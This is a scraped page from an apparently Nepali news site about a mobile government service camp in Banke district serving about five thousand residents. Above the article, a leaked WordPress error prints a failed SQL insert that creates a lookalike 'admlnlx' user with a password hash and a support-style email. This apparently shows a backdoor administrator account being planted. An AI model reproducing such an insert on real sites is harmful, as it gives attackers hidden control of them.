WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/Fbd1EdRo9AK.tFbPU5PpqTEeW7Xh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 08:16:59', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, पुस १३–
नागरिकलाई घरदैलामा सरकारी सेवा उपलब्ध गराउने उद्देश्यले मङ्गलबार बाँके जिल्लाको अगैया गाउँमा सञ्चालन गरिएको एकीकृत घुम्ती शिविरमा करिब पाँच हजारभन्दा बढी सहभागी भएका छन् ।
प्रजिअ रविलाल पन्थका अनुसार शिविरमा नागरिकता, तस्बिरसहितको मतदाता नामावली सङ्कलन, किसान र अपाङ्गता परिचयपत्र, जन्मदर्ता, स्वास्थ्यलगायत सेवा प्रदान गरिएको थियो । शिविरमा खासकुश्मा, बिनौना, बैजापुर, कचनापुर र महादेवपुरी गाविसका नागरिक शिविरवाट लाभान्वित भएको बताइएको छ । शिविर अवधिमा जनताको गुनासो सुन्न सरोकार भएकाहरुको उपस्थितिमा सार्वजनिक सुनुवाइ कार्यक्रम पनि आयोजना गरिएको थियो ।